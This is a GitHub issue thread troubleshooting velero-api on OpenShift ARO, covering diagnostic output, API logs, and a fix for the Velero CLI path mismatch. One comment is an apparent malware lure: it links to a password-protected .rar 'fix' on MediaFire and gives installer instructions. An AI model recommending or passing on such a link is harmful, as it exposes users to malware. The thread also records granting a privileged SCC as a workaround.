### ISSUE TITLE
OpenShift - Error[Errno 2] No such file or directory

### ISSUE THREAD

**Issue by louise-zhang** [seriohub/velero-api#36]
Hi Team,

I'm encountering the following errors in the velero-api pod while loading the UI:
![image](https://github.com/user-attachments/assets/7b2c6510-29b7-4d55-906c-b333775e2e4b)

- OpenShift Cluster: ARO v4.14.33
- OADP Operator: v1.3.3 (Velero 1.12.4)
- VUI: Helm v0.1.15

I followed the [solution provided](https://github.com/seriohub/velero-ui/issues/38#issuecomment-2269430545) to add the securityTokenKey, but the issue still persists.

Below is the agent diagnostic output:

```
# Agent State Manager Report**

- Backend info
  - app_name: **velero-api**;
  - helm_app_version: **0.1.14**;
  - helm_version: **0.1.15**;
  - helm_api: **0.1.18**;
  - helm_ui: **0.1.16**;
  - api_release_version: **0.1.18**;
  - helm_watchdog: **0.1.6**;
- UI URL: **https://###.###.###**
- API URL: **https://###.###.###/api**
- K8s Health
  - cluster online: **true**
  - nodes:
    - total: **7**;
    - in error: **0**;
- API Origins
  - https://###.###.###;
- Architecture: **amd64**
- Watchdog: **alive**
- Compatibility: **true**
- Boolean State
  - getUiURL: **true**;
  - getApiURL: **true**;
  - checkApiReacheable: **true**;
  - getArchitecture: **true**;
  - getOrigins: **true**;
  - validateOrigins: **true**;
  - getWatchdogInfo: **true**;
  - getClusterHealth: **true**;
  - getUiApiVerCompatibility: **true**;
```

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by davideserio** [comment]
Hi,
can you try authenticating in the swagger interface and check api logs?
The swagger interface is available at https://\<your-domain\>/api/docs

**Comment by louise-zhang** [comment]
Hi @davideserio, thanks for your response.

Below are the api logs and output while loading `https://<your-domain>/api/docs`

Logs:
```
INFO:     x.x.x.x:47654 - "GET /api/docs HTTP/1.1" 404 Not Found
DEBUG:    < CLOSE 1001 (going away) [2 bytes]
DEBUG:    = connection is CLOSING
DEBUG:    > CLOSE 1001 (going away) [2 bytes]
DEBUG:    x half-closing TCP connection
DEBUG:    = connection is CLOSED
INFO:     connection closed
DEBUG:    < CLOSE 1001 (going away) [2 bytes]
DEBUG:    = connection is CLOSING
DEBUG:    > CLOSE 1001 (going away) [2 bytes]
DEBUG:    x half-closing TCP connection
DEBUG:    = connection is CLOSED
INFO:     connection closed
INFO:     x.x.x.x:35204 - "GET /api/docs HTTP/1.1" 404 Not Found
```

Output:
```
{
    "detail": "Not Found"
}
```

**Comment by louise-zhang** [comment]
Hi @davideserio, apologies the env var `API_ENABLE_DOCUMENTATION` was missing in `velero-api-config`, after adding it back to the configmap, now I am able to access the swagger interface.

Below is the api pod log while authenticating in the swagger interface:
![image](https://github.com/user-attachments/assets/e1dfebe7-9fa6-4db9-8382-e2780c761828)
![image](https://github.com/user-attachments/assets/cc56d03a-feed-4418-a7e2-8f271040df35)

Below is the api pod log while getting the backup in the swagger interface:
![image](https://github.com/user-attachments/assets/ffddfcb1-e2fb-4645-9955-f6c6081025c0)
![image](https://github.com/user-attachments/assets/16c40010-acfe-4f1a-a3f8-d1cd46ca58a8)

Attached are the deployment manifests:
[vui-manifests.zip](https://github.com/user-attachments/files/16771082/vui-manifests.zip)

**Comment by louise-zhang** [comment]
Hi @davideserio, 
I found the solution for loading the backup data. The issue was related to the Velero client location. Previously, we encountered a "Permission denied" error because the Velero client couldn't be executed from /usr/local/bin/. This was resolved by changing the VELERO_CLI_DEST_PATH variable to /tmp. However, when trying to retrieve backups, the API pod was still looking for the Velero client in /usr/local/bin/, which caused the "No such file or directory" error.

![image](https://github.com/user-attachments/assets/7fca4855-9baa-4eeb-8ec0-dddb404188ac)

After adding the SCC privileged to the service account, the Velero command can now run from /usr/local/bin/. It would be good if we could change the Velero client path and execute it from the same path. It's not ideal to run container as privileged.
